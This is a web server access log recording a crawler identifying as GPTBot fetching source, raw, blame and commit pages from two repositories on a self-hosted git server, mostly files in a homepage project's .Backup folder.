"/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup" +[17/Feb/2026:14:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 53066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:14:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fproject.nuget.cache" [Client 74.7.227.38] [Length 22646] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:14:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" +[17/Feb/2026:14:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" +[17/Feb/2026:14:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" +[17/Feb/2026:14:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11651] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" +[17/Feb/2026:14:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 11347] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 13284] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" +[17/Feb/2026:14:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" +[17/Feb/2026:14:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" [Client 74.7.227.38] [Length 10368] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11497] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" +[17/Feb/2026:14:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" +[17/Feb/2026:14:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" +[17/Feb/2026:14:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" +[17/Feb/2026:14:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10862] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" +[17/Feb/2026:14:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 10982] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" +[17/Feb/2026:14:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10807] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" +[17/Feb/2026:14:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" [Client 74.7.227.38] [Length 10616] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" +[17/Feb/2026:14:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" +[17/Feb/2026:14:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10760] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" +[17/Feb/2026:14:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" +[17/Feb/2026:14:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12788] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" +[17/Feb/2026:14:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" +[17/Feb/2026:14:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" +[17/Feb/2026:14:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" +[17/Feb/2026:14:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 11077] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13903] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11303] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11886] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13176] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" +[17/Feb/2026:14:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12484] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" +[17/Feb/2026:14:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" +[17/Feb/2026:14:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" +[17/Feb/2026:14:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 12530] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" +[17/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 21809] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" +[17/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" +[17/Feb/2026:14:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10383] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" +[17/Feb/2026:14:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" +[17/Feb/2026:14:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11213] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" +[17/Feb/2026:14:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" +[17/Feb/2026:14:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12974] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" +[17/Feb/2026:14:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 